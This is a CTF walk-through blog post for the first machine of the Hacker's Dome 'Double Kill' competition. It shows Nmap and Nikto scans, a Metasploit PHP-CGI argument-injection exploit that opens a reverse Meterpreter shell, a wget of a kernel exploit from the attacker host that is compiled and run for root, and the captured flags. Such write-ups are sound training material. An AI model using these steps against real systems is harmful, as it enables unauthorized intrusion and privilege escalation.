Double Kill – Hacker’s Dome CTF Walk Through Part 1

This past weekend our Quantum Security CTF Team (consisting of Kamil @vavkamil and myself @jamesbower ) competed on the Hacker’s Dome – Double Kill CTF.  The competition consisted of two vulnerable machines with each containing both a user flag and a super user (root) flag.  We were able to capture both flags on the first server and here is the walk through.

First target: 10.200.0.4

Nmap scan:
==========

Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-26 17:06 CEST
Nmap scan report for 10.200.0.4
Host is up (0.067s latency).
Not shown: 996 closed ports
PORT    STATE    SERVICE     VERSION
22/tcp  open     ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 3d:ab:fe:49:52:95:1e:f5:bf:9f:eb:ff:d8:6e:fb:16 (DSA)
|   2048 5c:43:53:0c:cb:50:57:3b:c6:b6:68:32:4d:fd:5c:f9 (RSA)
|_  256 f0:d9:63:a2:e0:b8:47:cc:46:32:19:2f:89:4b:a7:e4 (ECDSA)
80/tcp  open     http        Apache httpd 2.2.22 ((Ubuntu))
|_http-methods: No Allow or Public header in OPTIONS response (status code 302)
| http-title: phpMyAdmin
|_Requested resource was http://10.200.0.4/phpMyAdmin-4.2.6-all-languages/
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 9 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SSH is relatively up to date and so is Apache so time to see what Nikto finds.

Nikto scan:
===========

—————————————————————————
+ Target IP:          10.200.0.4
+ Target Hostname:    10.200.0.4
+ Target Port:        80
+ Start Time:         2014-07-26 11:22:26 (GMT-4)
—————————————————————————
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3
+ The anti-clickjacking X-Frame-Options header is not present.
+ Root page / redirects to: /phpMyAdmin-4.2.6-all-languages
+ Uncommon header ‘tcn’ found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for ‘index’ were found: index.php
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ /cgi-bin/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 284076, size: 5108, mtime: Tue Aug 28 06:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-: /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See http://www.kb.cert.org/vuls/id/520827
+ 7355 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2014-07-26 11:40:41 (GMT-4) (1095 seconds)
—————————————————————————

At first I spent quite a bit of time in the /phpMyAdmin-4.2.6-all-languages directory trying to find some type of foothold.  But this remained fruitless and I felt like I was wasting too much time on one thing.  I decided to continue enumerating to see if anything else would appear that I could use.

More enumeration:
=================

Dirb finds nothing of real interest.

http://10.200.0.4/cgi-bin/



Going back over my Nikto results I see this (OSVDB-: /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution.)

I wasn’t familiar with this vulnerability so I dug a little bit deeper and came across a great couple of articles about it and was eventually able to find out that Metasploit already had a module for it.  Great!

Exploitation:
=============

https://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection

0.4_2

msf > use exploit/multi/http/php_cgi_arg_injection
msf exploit(php_cgi_arg_injection) > show options

Module options (exploit/multi/http/php_cgi_arg_injection):

Name         Current Setting  Required  Description
—-         —————  ——–  ———–
PLESK        false            yes       Exploit Plesk
Proxies                       no        Use a proxy chain
RHOST                         yes       The target address
RPORT        80               yes       The target port
TARGETURI                     no        The URI to request (must be a CGI-handled PHP script)
URIENCODING  0                yes       Level of URI URIENCODING and padding (0 for minimum)
VHOST                         no        HTTP server virtual host

Exploit target:

Id  Name
—  —-
0   Automatic

msf exploit(php_cgi_arg_injection) > set RHOST 10.200.0.4
RHOST => 10.200.0.4
msf exploit(php_cgi_arg_injection) > set LPORT 8080
LPORT => 80
msf exploit(php_cgi_arg_injection) > exploit

[*] Started reverse handler on 172.16.237.66:8080
[*] Sending stage (40551 bytes) to 10.200.0.4
[*] Meterpreter session 1 opened (172.16.237.66:8080 -> 10.200.0.4:59780) at 2014-07-26 22:40:23 +0200

meterpreter > shell
Process 28156 created.
Channel 0 created.
python -c ‘import pty; pty.spawn(“/bin/bash”)’

First flag:
===========

www-data@ctf02-01:/var/www$ cat user-trohphy.txt
40a5e0e8aa540359d7e99304118cc86aebabd08c

With this we’re able to get the first user-trophy.txt and move on to getting a root shell.

Local root exploit:
===================

3.2.0-23-generic
x86_64 x86_64 x86_64

http://www.exploit-db.com/exploits/33589/

www-data@ctf02-01:/tmp/infinity$ wget 172.16.237.66/exploit.c
wget 172.16.237.66/exploit.c
–2014-07-26 23:42:11–  http://172.16.237.66/exploit.c
Connecting to 172.16.237.66:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 3845 (3.8K) [text/x-csrc]
Saving to: `exploit.c’

100%[======================================>] 3,845       –.-K/s   in 0s

2014-07-26 23:42:11 (20.3 MB/s) – `exploit.c’ saved [3845/3845]

www-data@ctf02-01:/tmp/infinity$ gcc exploit.c -O2 -o vnik
gcc exploit.c -O2 -o vnik
www-data@ctf02-01:/tmp/infinity$ ./vnik 0
./vnik 0
IDT addr = 0xffffffff81dd7000
Using int = 3 with offset = -49063
root@ctf02-01:/tmp/infinity# whoami
whoami
root
root@ctf02-01:/tmp/infinity# cd /root
cd /root
root@ctf02-01:~# ls
ls
superuser-trophy.txt

Second flag:
===========

root@ctf02-01:~# cat superuser-trophy.txt
cat superuser-trophy.txt
8f8bc25a81e76ffd51e534eb0633eeb0c70cdf01

root@ctf02-01:~#

And as always, thank you for taking the time to read this. If you have any comments, questions, or critiques, please reach out to me on our FREE ML Security Discord Server – HERE

Related Posts

Leave a Reply